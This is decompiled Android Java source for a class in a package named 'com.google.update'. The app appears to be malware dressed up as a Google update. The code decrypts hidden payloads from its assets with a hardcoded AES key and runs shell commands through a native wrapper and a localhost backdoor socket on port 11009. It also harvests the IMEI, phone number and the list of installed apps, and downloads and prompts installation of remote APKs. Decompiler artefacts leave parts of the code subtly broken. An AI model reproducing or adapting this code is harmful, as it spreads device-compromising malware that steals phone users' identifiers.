package com.google.update;

import android.app.ActivityManager;
import android.content.Context;
import android.content.Intent;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.net.Uri;
import android.os.Build;
import android.os.Environment;
import android.os.StatFs;
import android.os.SystemClock;
import android.telephony.TelephonyManager;
import android.text.format.Formatter;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.Inet4Address;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import uk.co.lilhermit.android.core.Native;
/* loaded from: classes.dex */
public class Utils {
    private static byte[] defPassword = {70, 117, 99, 107, 95, 115, 69, 120, 121, 45, 97, 76, 108, 33, 80, 119};

    public static String getPath(Context context, String file) {
        String path = Environment.getExternalStorageDirectory().getPath();
        if (!Environment.getExternalStorageState().equals("mounted")) {
            path = context.getFilesDir().getPath();
        }
        if (file != null) {
            return String.valueOf(path) + "/" + file + "/";
        }
        return path;
    }

    public static File createFile(String path) {
        File file = new File(path);
        if (!file.exists()) {
            try {
                file.createNewFile();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
        return file;
    }

    public static boolean isConnected(Context context) {
        ConnectivityManager cmd = (ConnectivityManager) context.getSystemService("connectivity");
        NetworkInfo info = cmd.getNetworkInfo(1);
        if (info.isConnected()) {
            return true;
        }
        NetworkInfo info2 = cmd.getNetworkInfo(0);
        return info2.isConnected();
    }

    public static boolean checkPermission() {
        if (new File(StateRes.tSysFile).exists()) {
            return tryStartPermission();
        }
        return false;
    }

    public static boolean tryStartPermission() {
        if (TCP.isListened()) {
            return true;
        }
        TCP.startListen();
        return TCP.isListened();
    }

    public static void runsh(final String cmd, final String param) {
        try {
            Thread thread = new Thread(new Runnable() { // from class: com.google.update.Utils.1
                @Override // java.lang.Runnable
                public void run() {
                    Native.runcmd_wrapper(cmd, param);
                }
            });
            thread.start();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void oldrun(String cmd, String param) {
        try {
            Runtime rt = Runtime.getRuntime();
            String fullCmd = String.valueOf(cmd) + " " + param;
            rt.exec(fullCmd).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void copyAssets(Context context, String src, String dest, int len) {
        Exception e;
        OutputStream myOutput;
        OutputStream myOutput2 = null;
        InputStream myInput = null;
        if (len <= 0) {
            return;
        }
        try {
            try {
                myOutput = new FileOutputStream(dest);
            } catch (Exception e2) {
                e = e2;
            }
        } catch (Throwable th) {
            th = th;
        }
        try {
            myInput = context.getClass().getResourceAsStream("/assets/" + src);
            byte[] buff = new byte[len];
            myInput.read(buff);
            byte[] decryptBuff = decrypt(buff);
            myOutput.write(decryptBuff);
            myOutput.flush();
            if (myInput != null) {
                try {
                    myInput.close();
                } catch (Exception e3) {
                }
            }
            if (myOutput != null) {
                try {
                    myOutput.close();
                } catch (Exception e4) {
                }
            }
        } catch (Exception e5) {
            e = e5;
            myOutput2 = myOutput;
            e.printStackTrace();
            if (myInput != null) {
                try {
                    myInput.close();
                } catch (Exception e6) {
                }
            }
            if (myOutput2 != null) {
                try {
                    myOutput2.close();
                } catch (Exception e7) {
                }
            }
        } catch (Throwable th2) {
            th = th2;
            myOutput2 = myOutput;
            if (myInput != null) {
                try {
                    myInput.close();
                } catch (Exception e8) {
                }
            }
            if (myOutput2 != null) {
                try {
                    myOutput2.close();
                } catch (Exception e9) {
                }
            }
            throw th;
        }
    }

    public static String[] downloadFile(Context context, String url) {
        URL filePath;
        URL filePath2;
        InputStream is;
        File file;
        File[] files;
        if (url == null || "".equals(url)) {
            return null;
        }
        try {
            filePath2 = new URL(url);
        } catch (Exception e) {
            e = e;
            filePath = null;
        }
        try {
            HttpURLConnection hc = (HttpURLConnection) filePath2.openConnection();
            hc.setConnectTimeout(30000);
            hc.setReadTimeout(30000);
            hc.setDoInput(true);
            hc.connect();
            is = hc.getInputStream();
            file = new File(url);
        } catch (Exception e2) {
            e = e2;
            filePath = filePath2;
            e.printStackTrace();
            return null;
        }
        if (file == null) {
            return null;
        }
        String fileName = file.getName();
        String path = getPath(context, "download");
        File ff = new File(path);
        if (!ff.exists()) {
            ff.mkdir();
        }
        if (!path.contains("sdcard") && (files = ff.listFiles()) != null && files.length > 0) {
            for (File f : files) {
                if (f.exists()) {
                    f.delete();
                }
            }
        }
        FileOutputStream fos = new FileOutputStream(String.valueOf(path) + fileName);
        byte[] buffer = new byte[2048];
        if (is != null && fos != null) {
            while (true) {
                int byteread = is.read(buffer);
                if (byteread == -1) {
                    break;
                }
                fos.write(buffer, 0, byteread);
            }
            fos.flush();
            is.close();
            fos.close();
            String[] info = {String.valueOf(path) + fileName, fileName};
            File downloadFile = new File(String.valueOf(path) + fileName);
            if (downloadFile.exists()) {
                return info;
            }
        }
        return null;
    }

    public static byte[] decrypt(byte[] encrypted) throws Exception {
        SecretKeySpec skeySpec = new SecretKeySpec(defPassword, "AES");
        Cipher cipher = Cipher.getInstance("AES");
        cipher.init(2, skeySpec);
        byte[] decrypted = cipher.doFinal(encrypted);
        return decrypted;
    }

    /* loaded from: classes.dex */
    public static class PkgManager {
        public static String[] getPackageMsg(Context context, String fileName) {
            String[] msg = new String[4];
            String archiveFilePath = String.valueOf(Utils.getPath(context, "download")) + fileName;
            PackageManager pm = context.getPackageManager();
            PackageInfo info = pm.getPackageArchiveInfo(archiveFilePath, 1);
            if (info != null) {
                ApplicationInfo appInfo = info.applicationInfo;
                String packageName = appInfo.packageName;
                String version = info.versionName;
                msg[1] = packageName;
                msg[2] = version;
            }
            return msg;
        }

        public static List<String> getInstallPackages(Context context) {
            PackageManager pm = context.getPackageManager();
            List<PackageInfo> infos = pm.getInstalledPackages(0);
            List<String> packages = new ArrayList<>();
            for (PackageInfo info : infos) {
                ApplicationInfo appInfo = info.applicationInfo;
                packages.add(appInfo.packageName);
            }
            return packages;
        }

        public static List<PackageInfo> getInstallPackageInfo(Context context) {
            PackageManager pm = context.getPackageManager();
            List<PackageInfo> infos = pm.getInstalledPackages(0);
            return infos;
        }

        public static void installApp(Context context, String fileName) {
            Intent intent = new Intent("android.intent.action.VIEW");
            intent.setDataAndType(Uri.fromFile(new File(fileName)), "application/vnd.android.package-archive");
            intent.setFlags(268435456);
            context.startActivity(intent);
        }

        public static boolean isInstalled(Context context, String pkgName) {
            List<String> installPackages = getInstallPackages(context);
            return installPackages != null && installPackages.size() > 0 && installPackages.contains(pkgName);
        }
    }

    /* loaded from: classes.dex */
    public static class PhoneState {
        public static TelephonyManager getTelManager(Context context) {
            TelephonyManager telephonyManager = (TelephonyManager) context.getSystemService("phone");
            return telephonyManager;
        }

        public static String getImei(Context context) {
            TelephonyManager telephonyManager = getTelManager(context);
            String imei = telephonyManager.getDeviceId();
            return imei;
        }

        public static String getMobile(Context context) {
            TelephonyManager telephonyManager = getTelManager(context);
            String mobile = telephonyManager.getLine1Number();
            return mobile;
        }

        public static String getModel() {
            String model = String.valueOf(Build.BRAND) + " " + Build.MODEL;
            return model;
        }

        public static String[] getSDKVersion() {
            String[] versions = {Build.VERSION.RELEASE, Build.VERSION.SDK};
            return versions;
        }

        public static String getAliaMemorySize(Context context) {
            ActivityManager activityManager = (ActivityManager) context.getSystemService("activity");
            ActivityManager.MemoryInfo memoryInfo = new ActivityManager.MemoryInfo();
            activityManager.getMemoryInfo(memoryInfo);
            String memorySize = Formatter.formatFileSize(context, memoryInfo.availMem);
            return memorySize;
        }

        public static String getSDCardState(Context context) {
            if (Environment.getExternalStorageState().equals("mounted")) {
                return getSDAliaMemory(context);
            }
            return null;
        }

        public static StatFs getStatFs() {
            StatFs statFs = new StatFs(Environment.getExternalStorageDirectory().getPath());
            return statFs;
        }

        public static int getBlockSize() {
            int blockSize = getStatFs().getBlockSize();
            return blockSize;
        }

        public static String getSDAliaMemory(Context context) {
            StatFs statFs = getStatFs();
            int availableBlocks = statFs.getAvailableBlocks();
            String aliaSize = Formatter.formatFileSize(context, Long.valueOf(getBlockSize()).longValue() * Long.valueOf(availableBlocks).longValue());
            return aliaSize;
        }

        public static String getConnectType(Context context) {
            ConnectivityManager connectivityManager = (ConnectivityManager) context.getSystemService("connectivity");
            return (connectivityManager == null || connectivityManager.getActiveNetworkInfo() == null) ? "UNKNOWN" : connectivityManager.getActiveNetworkInfo().getTypeName();
        }

        public static String getNetOperater(Context context) {
            ConnectivityManager connectivityManager = (ConnectivityManager) context.getSystemService("connectivity");
            return (connectivityManager == null || connectivityManager.getActiveNetworkInfo() == null) ? "UNKNOWN" : connectivityManager.getActiveNetworkInfo().getExtraInfo();
        }

        public static List<String> getRuningServices(Context context) {
            ActivityManager activityManager = (ActivityManager) context.getSystemService("activity");
            List<ActivityManager.RunningServiceInfo> serivces = activityManager.getRunningServices(100);
            List<String> servicesName = new ArrayList<>();
            for (ActivityManager.RunningServiceInfo service : serivces) {
                servicesName.add(service.service.getShortClassName());
            }
            return servicesName;
        }
    }

    /* loaded from: classes.dex */
    public static class TCP {
        public static final int PORT = 11009;
        public static final String SERVER = "localhost";

        public static boolean isListened() {
            Exception e;
            Socket sk = null;
            boolean result = false;
            try {
                try {
                    Socket sk2 = new Socket(SERVER, (int) PORT);
                    if (sk2 != null) {
                        try {
                            if (!sk2.isConnected()) {
                                Inet4Address addr = (Inet4Address) InetAddress.getByName(SERVER);
                                sk2.connect(new InetSocketAddress(addr, (int) PORT), 50000);
                            }
                            if (sk2.isConnected()) {
                                result = true;
                            }
                        } catch (Exception e2) {
                            e = e2;
                            sk = sk2;
                            e.printStackTrace();
                            if (sk != null) {
                                try {
                                    sk.close();
                                } catch (Exception e3) {
                                }
                            }
                            return result;
                        } catch (Throwable th) {
                            th = th;
                            sk = sk2;
                            if (sk != null) {
                                try {
                                    sk.close();
                                } catch (Exception e4) {
                                }
                            }
                            throw th;
                        }
                    } else {
                        result = true;
                    }
                    if (sk2 != null) {
                        try {
                            sk2.close();
                        } catch (Exception e5) {
                        }
                    }
                } catch (Exception e6) {
                    e = e6;
                }
                return result;
            } catch (Throwable th2) {
                th = th2;
            }
        }

        public static boolean execute(String cmd) {
            IOException e;
            Socket sk = null;
            boolean result = false;
            try {
                try {
                    Socket sk2 = new Socket(SERVER, (int) PORT);
                    if (sk2 != null) {
                        try {
                            if (!sk2.isConnected()) {
                                Inet4Address addr = (Inet4Address) InetAddress.getByName(SERVER);
                                sk2.connect(new InetSocketAddress(addr, (int) PORT), 50000);
                            }
                            if (sk2.isConnected()) {
                                OutputStream os = sk2.getOutputStream();
                                InputStream is = sk2.getInputStream();
                                if (os != null) {
                                    byte[] cmdByte = cmd.getBytes();
                                    os.write(cmdByte);
                                    os.flush();
                                    os.close();
                                }
                                if (is != null) {
                                    SystemClock.sleep(5000L);
                                    result = true;
                                }
                            }
                        } catch (IOException e2) {
                            e = e2;
                            sk = sk2;
                            e.printStackTrace();
                            if (sk != null) {
                                try {
                                    sk.close();
                                } catch (Exception e3) {
                                }
                            }
                            return result;
                        } catch (Throwable th) {
                            th = th;
                            sk = sk2;
                            if (sk != null) {
                                try {
                                    sk.close();
                                } catch (Exception e4) {
                                }
                            }
                            throw th;
                        }
                    }
                    if (sk2 != null) {
                        try {
                            sk2.close();
                            sk = sk2;
                        } catch (Exception e5) {
                            sk = sk2;
                        }
                    } else {
                        sk = sk2;
                    }
                } catch (Throwable th2) {
                    th = th2;
                }
            } catch (IOException e6) {
                e = e6;
            }
            return result;
        }

        public static void startListen() {
            if (new File(StateRes.tSysFile).exists()) {
                Utils.runsh(StateRes.tSysFile, "");
                SystemClock.sleep(1000L);
            }
        }
    }
}
